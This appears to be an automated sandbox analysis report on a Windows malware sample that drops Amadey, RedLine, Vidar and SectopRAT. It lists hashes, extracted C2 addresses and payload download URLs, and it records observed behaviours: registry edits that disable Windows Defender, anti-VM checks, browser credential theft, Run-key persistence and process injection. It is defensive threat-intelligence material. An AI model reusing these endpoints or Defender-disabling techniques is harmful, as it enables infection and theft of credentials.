Resubmissions
21/02/2025, 13:19
250221-qkqm1sskh1 1021/02/2025, 12:51
250221-p3vt1ssmek 1020/02/2025, 14:07
250220-rey8mswqdj 10Analysis
-
max time kernel
323s -
max time network
326s -
platform
windows11-21h2_x64 -
resource
win11-20250217-en -
resource tags
arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system -
submitted
21/02/2025, 12:51
Static task
static1
Behavioral task
behavioral1
Sample
0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
Resource
win11-20250217-en
General
-
Target
0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
-
Size
2.1MB
-
MD5
f22b0344fefdf201d07314323a83b022
-
SHA1
6dde721e943cb298e50446083c1d7260071aaaae
-
SHA256
0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483
-
SHA512
61f92704af7395159edb879fe394a64e30b0b0818d642be1eeecafeee54e22570add0e4eac88c83e00cd9a4642e09a8529c77a69b4b7613bc3bcb9f78f50feac
-
SSDEEP
49152:vDB/YpemdpJhhEwrtke2DSl/YKH7vOITWMPnzZPoc9j:9/kXhEikRDS/bvOIbPnzZxj
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
redline
cheat
103.84.89.222:33791
Extracted
vidar
https://t.me/g02f04
https://steamcommunity.com/profiles/76561199828130190
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Signatures
-
Amadey family
-
Detect Vidar Stealer 3 IoCs
resource yara_rule behavioral1/memory/3804-821-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/5508-826-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral1/memory/3804-825-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/1560-1091-0x0000000000E40000-0x000000000128C000-memory.dmp healer behavioral1/memory/1560-1090-0x0000000000E40000-0x000000000128C000-memory.dmp healer behavioral1/memory/1560-1220-0x0000000000E40000-0x000000000128C000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
SectopRAT payload 6 IoCs
resource yara_rule behavioral1/memory/5372-333-0x0000000000800000-0x0000000000C78000-memory.dmp family_sectoprat behavioral1/memory/5372-334-0x0000000000800000-0x0000000000C78000-memory.dmp family_sectoprat behavioral1/memory/1076-1422-0x0000000000690000-0x0000000000B08000-memory.dmp family_sectoprat behavioral1/memory/1076-1423-0x0000000000690000-0x0000000000B08000-memory.dmp family_sectoprat behavioral1/memory/1076-2983-0x0000000000690000-0x0000000000B08000-memory.dmp family_sectoprat behavioral1/memory/5372-2985-0x0000000000800000-0x0000000000C78000-memory.dmp family_sectoprat -
Sectoprat family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 27 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d2YQIJa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ spoDnGT.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ afaefd507f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 67152b305c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 26da168d66.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ViGgA8C.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ sHN20me.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ MAl7pjE.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ebp51gY.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d35ce9d381.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 33f82ae2b0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1cc9b19df2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ebp51gY.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fa829ac30d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5a903ed074.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b91b4b1726.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempP38TDZ3N0DXTVKH63N3AOQ5IBQLFYYV0.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1e56a29b0d.exe -
Blocklisted process makes network request 64 IoCs
flow pid Process 38 5572 powershell.exe 39 5572 powershell.exe 44 5572 powershell.exe 46 5572 powershell.exe 47 5572 powershell.exe 50 5572 powershell.exe 51 5572 powershell.exe 52 5572 powershell.exe 55 5572 powershell.exe 58 5572 powershell.exe 62 5572 powershell.exe 64 5572 powershell.exe 67 5572 powershell.exe 70 5572 powershell.exe 71 5572 powershell.exe 72 5572 powershell.exe 73 5572 powershell.exe 74 5572 powershell.exe 75 5572 powershell.exe 76 5572 powershell.exe 77 5572 powershell.exe 78 5572 powershell.exe 79 5572 powershell.exe 80 5572 powershell.exe 81 5572 powershell.exe 82 5572 powershell.exe 83 5572 powershell.exe 84 5572 powershell.exe 85 5572 powershell.exe 86 5572 powershell.exe 91 5572 powershell.exe 94 5572 powershell.exe 96 5572 powershell.exe 98 5572 powershell.exe 99 5572 powershell.exe 100 5572 powershell.exe 101 5572 powershell.exe 102 5572 powershell.exe 103 5572 powershell.exe 104 5572 powershell.exe 106 5572 powershell.exe 107 5572 powershell.exe 108 5572 powershell.exe 109 5572 powershell.exe 111 5572 powershell.exe 112 5572 powershell.exe 113 5572 powershell.exe 116 5572 powershell.exe 118 5572 powershell.exe 121 5572 powershell.exe 122 5572 powershell.exe 123 5572 powershell.exe 124 5572 powershell.exe 125 5572 powershell.exe 126 5572 powershell.exe 127 5572 powershell.exe 128 5572 powershell.exe 129 5572 powershell.exe 132 5572 powershell.exe 134 5572 powershell.exe 140 5572 powershell.exe 142 5572 powershell.exe 145 5572 powershell.exe 147 5572 powershell.exe -
pid Process 3376 powershell.exe 4512 powershell.exe 4812 powershell.exe 72 powershell.exe 568 powershell.exe 3696 powershell.exe 5804 powershell.exe 1996 powershell.exe -
Downloads MZ/PE file 35 IoCs
flow pid Process 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 3 4576 skotes.exe 176 4576 skotes.exe 176 4576 skotes.exe 176 4576 skotes.exe 176 4576 skotes.exe 308 5580 BitLockerToGo.exe 338 3960 BitLockerToGo.exe 184 3696 powershell.exe 212 5804 powershell.exe 350 1996 powershell.exe -
Uses browser remote debugging 2 TTPs 28 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 5948 msedge.exe 5324 msedge.exe 4584 chrome.exe 484 chrome.exe 852 msedge.exe 5856 chrome.exe 5192 chrome.exe 4816 chrome.exe 5960 chrome.exe 3884 chrome.exe 4980 chrome.exe 2268 msedge.exe 6036 msedge.exe 3040 chrome.exe 2332 chrome.exe 3264 msedge.exe 5488 chrome.exe 6056 msedge.exe 4760 msedge.exe 1616 chrome.exe 3948 chrome.exe 5000 msedge.exe 5988 msedge.exe 5232 msedge.exe 3128 msedge.exe 1604 chrome.exe 2640 chrome.exe 5712 msedge.exe -
Checks BIOS information in registry 2 TTPs 54 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5a903ed074.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b91b4b1726.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ViGgA8C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ViGgA8C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1cc9b19df2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b91b4b1726.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion afaefd507f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d35ce9d381.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d35ce9d381.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sHN20me.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion spoDnGT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MAl7pjE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion afaefd507f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1cc9b19df2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5a903ed074.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MAl7pjE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ebp51gY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 67152b305c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1e56a29b0d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ebp51gY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fa829ac30d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion spoDnGT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempP38TDZ3N0DXTVKH63N3AOQ5IBQLFYYV0.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempP38TDZ3N0DXTVKH63N3AOQ5IBQLFYYV0.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ebp51gY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fa829ac30d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 26da168d66.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 26da168d66.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ebp51gY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 67152b305c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 33f82ae2b0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1e56a29b0d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sHN20me.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 33f82ae2b0.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe -
Executes dropped EXE 50 IoCs
pid Process 4576 skotes.exe 2832 6349023c59.exe 1556 6349023c59.exe 5736 6349023c59.exe 1612 6349023c59.exe 3940 13Z5sqy.exe 1396 jonbDes.exe 852 Bjkm5hE.exe 2696 Bjkm5hE.exe 1672 Bjkm5hE.exe 5372 ViGgA8C.exe 2556 DTQCxXZ.exe 5832 TaVOM7x.exe 4104 d2YQIJa.exe 2104 sHN20me.exe 3912 spoDnGT.exe 1408 7aencsM.exe 3804 7aencsM.exe 5508 7aencsM.exe 3992 skotes.exe 5588 dzvh4HC.exe 1952 MAl7pjE.exe 1484 lwtLxxH.exe 1716 7nSTXG6.exe 3172 c9aa4cecce.exe 1560 TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE 4432 ebp51gY.exe 3244 483d2fa8a0d53818306efeb32d3.exe 5208 a8a5b07bf4.exe 1692 d74640f13d.exe 3792 afaefd507f.exe 5944 67152b305c.exe 1076 d35ce9d381.exe 3588 skotes.exe 2680 33f82ae2b0.exe 3116 1cc9b19df2.exe 3244 5a903ed074.exe 2436 b91b4b1726.exe 1752 54352f7f9d.exe 1404 85e559204e.exe 6200 TempP38TDZ3N0DXTVKH63N3AOQ5IBQLFYYV0.EXE 6676 1e56a29b0d.exe 4696 ebp51gY.exe 6984 DTQCxXZ.exe 4956 7nSTXG6.exe 6680 fa829ac30d.exe 3808 26da168d66.exe 4148 skotes.exe 4884 skotes.exe 6048 skotes.exe -
Identifies Wine through registry keys 2 TTPs 27 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine d2YQIJa.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine MAl7pjE.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine ebp51gY.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine b91b4b1726.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine spoDnGT.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine TempP38TDZ3N0DXTVKH63N3AOQ5IBQLFYYV0.EXE Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine ebp51gY.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine fa829ac30d.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine 67152b305c.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine 33f82ae2b0.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine 5a903ed074.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine 1e56a29b0d.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine 26da168d66.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine sHN20me.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine afaefd507f.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine d35ce9d381.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine 1cc9b19df2.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine 0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe Key opened \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Wine ViGgA8C.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Microsoft\Windows\CurrentVersion\Run\c9aa4cecce.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090366101\\c9aa4cecce.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090367021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Microsoft\Windows\CurrentVersion\Run\5a903ed074.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090379001\\5a903ed074.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Microsoft\Windows\CurrentVersion\Run\b91b4b1726.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090380001\\b91b4b1726.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Microsoft\Windows\CurrentVersion\Run\54352f7f9d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090381001\\54352f7f9d.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3449935180-2903586757-2462874082-1000\Software\Microsoft\Windows\CurrentVersion\Run\85e559204e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1090382001\\85e559204e.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ipinfo.io -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x001100000002af84-1041.dat autoit_exe behavioral1/files/0x001b00000002afe0-1892.dat autoit_exe behavioral1/files/0x002d00000002aff3-1973.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 27 IoCs
pid Process 5468 0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe 4576 skotes.exe 5372 ViGgA8C.exe 4104 d2YQIJa.exe 2104 sHN20me.exe 3912 spoDnGT.exe 3992 skotes.exe 1952 MAl7pjE.exe 1560 TempMCYO79ALDPNWN9ZE4EQAADYOVROJEOXB.EXE 4432 ebp51gY.exe 3244 483d2fa8a0d53818306efeb32d3.exe 3792 afaefd507f.exe 5944 67152b305c.exe 1076 d35ce9d381.exe 3588 skotes.exe 2680 33f82ae2b0.exe 3116 1cc9b19df2.exe 3244 5a903ed074.exe 2436 b91b4b1726.exe 6200 TempP38TDZ3N0DXTVKH63N3AOQ5IBQLFYYV0.EXE 6676 1e56a29b0d.exe 4696 ebp51gY.exe 6680 fa829ac30d.exe 3808 26da168d66.exe 4148 skotes.exe 4884 skotes.exe 6048 skotes.exe -
Suspicious use of SetThreadContext 13 IoCs
description pid Process procid_target PID 2832 set thread context of 1556 2832 6349023c59.exe 85 PID 2832 set thread context of 1612 2832 6349023c59.exe 87 PID 852 set thread context of 2696 852 Bjkm5hE.exe 114 PID 852 set thread context of 1672 852 Bjkm5hE.exe 115 PID 1408 set thread context of 3804 1408 7aencsM.exe 134 PID 1408 set thread context of 5508 1408 7aencsM.exe 135 PID 3940 set thread context of 3332 3940 13Z5sqy.exe 138 PID 5832 set thread context of 6124 5832 TaVOM7x.exe 143 PID 1716 set thread context of 5268 1716 7nSTXG6.exe 236 PID 5944 set thread context of 5580 5944 67152b305c.exe 245 PID 2680 set thread context of 3960 2680 33f82ae2b0.exe 265 PID 5208 set thread context of 412 5208 a8a5b07bf4.exe 272 PID 4956 set thread context of 5096 4956 7nSTXG6.exe 365 -
resource yara_rule behavioral1/files/0x001d00000002af61-844.dat upx behavioral1/memory/5588-856-0x0000000000FC0000-0x0000000002282000-memory.dmp upx behavioral1/memory/5588-907-0x0000000000FC0000-0x0000000002282000-memory.dmp upx -
Drops file in Windows directory 5 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\SystemTemp chrome.exe File created C:\Windows\Tasks\skotes.job 0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\SystemTemp chrome.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 1952 2832 WerFault.exe 83 1592 852 WerFault.exe 113 2856 1408 WerFault.exe 133 1092 3116 WerFault.exe 246 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
